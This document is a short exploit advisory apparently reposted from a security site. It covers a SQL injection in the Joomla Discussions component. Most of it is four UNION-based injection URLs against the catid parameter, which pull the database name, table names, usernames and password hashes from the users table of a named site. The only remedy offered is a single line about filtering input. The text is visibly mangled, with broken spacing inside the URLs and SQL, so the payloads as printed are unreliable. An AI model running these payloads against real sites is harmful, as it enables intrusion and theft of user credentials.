Title: Joomla Discussions Component (com_discussions) SQL Injection Vulnerability
Author: Red Security TEAM www.2cto.com
: Http://extensions.joomla.org/extensions/communication/forum/13560
Test Platform: CentOS
Test example:
# Http://www.bkjia.com/index. php? Option = com_discussions & view = thread & catid = [SQLi]
#
Example:
#
#1. [Get Database Name]
# Http://www.bkjia.com/index. php? Option = com_discussions & view = thread & catid = 1 'Union all select concat (0x7e, 0x27, unhex (Hex (cast (database () as char ))), 0x27, 0x7e) -- +
#2. [Get Tables Name]
# Http://www.bkjia.com/index. php? Option = com_discussions & view = thread & catid = 1 'Union all select (select concat (0x7e, 0x27, count (table_name), 0x27, 0x7e) from 'information _ scheme '. tables where table_schema = 0x6f7574706f7374715f6f65621376) -- +
#3. [Get Username]
# Http://www.bkjia.com/index. php? Option = com_discussions & view = thread & catid = 1 'Union all select (select concat (0x7e, 0x27, unhex (Hex (cast (jos_users.username as char ))), 0x27, 0x7e) from '[ Database Name] '. jos_users Order by username limit 0, 1) -- +
#4. [Get Password]
# Http://www.bkjia.com/index. php? Option = com_discussions & view = thread & catid = 1 'Union all select (select concat (0x7e, 0x27, unhex (Hex (cast (jos_users.password as char ))), 0x27, 0x7e) from '[ Database Name] '. jos_users Order by username limit 0, 1) -- +
#
Www.2cto.com provides the repair solution:
Filter option parameter input on the index. php page